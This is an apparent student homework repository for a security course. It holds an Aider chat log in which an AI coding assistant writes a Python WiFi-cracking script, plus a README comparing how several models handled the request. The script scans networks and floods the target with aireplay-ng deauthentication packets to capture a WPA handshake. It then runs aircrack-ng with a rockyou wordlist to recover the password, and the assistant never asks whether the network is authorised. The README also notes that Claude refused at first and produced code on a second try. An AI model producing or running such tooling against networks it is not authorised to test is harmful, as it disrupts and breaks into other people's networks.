# Aider chat conversation:
USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application may utilize a wordlist found at ~/rockyou.txt
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/gemini/app.py
ASSISTANT: ```python
hw7/gemini/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time
def change_to_monitor_mode(interface):
"""Changes the given interface to monitor mode."""
subprocess.run(["sudo", "airmon-ng", "start", interface])
def change_to_managed_mode(interface):
"""Changes the given interface to managed mode."""
subprocess.run(["sudo", "airmon-ng", "stop", interface])
def get_wifi_interfaces():
"""Returns a list of available wifi interfaces."""
output = subprocess.run(["iwconfig"], capture_output=True).stdout.decode()
interfaces = re.findall(r"(\w+)\s+IEEE", output)
return interfaces
def get_target_network(interfaces):
"""Prompts the user to choose a target network from a list of scanned networks."""
print("Scanning for networks...")
process = subprocess.Popen(["sudo", "airodump-ng", "--band", "bg", "-w", "scan", interfaces[0]], stdout=subprocess.PIPE)
time.sleep(5) # Scan for a few seconds
process.terminate()
output = process.communicate()[0].decode()
networks = re.findall(r"(\s+)([0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2})\s+(-[0-9]+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(-\w+)\s+([0-9]+)\s+([0-9]+)\s+([0-9]+)\s+(.*)", output)
if networks:
print("Available networks:")
for i, network in enumerate(networks):
print(f"{i+1}. {network[-1]} (BSSID: {network[1]})")
choice = int(input("Choose target network: ")) - 1
return networks[choice]
else:
print("No networks found.")
return None
def capture_handshake(target_network, interface):
"""Captures the handshake of the target network."""
bssid = target_network[1]
channel = target_network[3]
subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", channel, "--write", "capture", interface], stdout=subprocess.DEVNULL)
print(f"Capturing handshake for {target_network[-1]} (BSSID: {bssid})...")
try:
while True:
subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
time.sleep(5)
except KeyboardInterrupt:
print("Handshake capture stopped.")
def crack_password(capture_file, wordlist):
"""Cracks the password of the captured handshake using the given wordlist."""
print("Cracking password...")
try:
output = subprocess.run(["sudo", "aircrack-ng", "-w", wordlist, capture_file], capture_output=True).stdout.decode()
password = re.search(r"KEY FOUND!\s+\[(.*)\]", output)
if password:
return password.group(1)
else:
return None
except FileNotFoundError:
print(f"Wordlist not found: {wordlist}")
return None
if __name__ == "__main__":
interfaces = get_wifi_interfaces()
if interfaces:
interface = interfaces[0] # Use the first interface for now
change_to_monitor_mode(interface)
target_network = get_target_network(interfaces)
if target_network:
capture_handshake(target_network, interface)
password = crack_password("capture-01.cap", "~/rockyou.txt")
if password:
print(f"Password found: {password}")
else:
print("Password not found.")
change_to_managed_mode(interface)
else:
print("No wifi interfaces found.")
>>>>>>> REPLACE
```
|
||
|---|---|---|
| .. | ||
| claude | ||
| gemini | ||
| gpt4 | ||
| README.md | ||
| screencast_url.txt | ||
David Westgate 31 May 2024
HW7 for gensec
The purpose of this assignment is to generate a security related application using aider. The application I will attempt to generate is a wifi penetration testing python. The intention is that this application will be able to perform the same wifi cracking that my hw6 LLM application did.
Input
Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/{llm}/app.py
Output - Gemini (gemini 1.5)
There were a few runs of errors, but eventually I was able to get aider to output a program with the gemini LLM
Errors
On the run where code was finally output, we still saw errors. But, we will ignore these for now
Code output
Analysis
Output - GPT4 (gpt40)
A script was generated here on the first try
Errors
Similarly, the code also generated with lint errors, and when prompted, I instructed airder to fix them. However, it did come up with a program on the first try

Code output
Analysis
Output - Claude (claude-opus)
I was able to redeem $5 of free API credits for this test
Errors
On the first shot, claude rejected this ask. On the second try, it gave a program with a nice summary


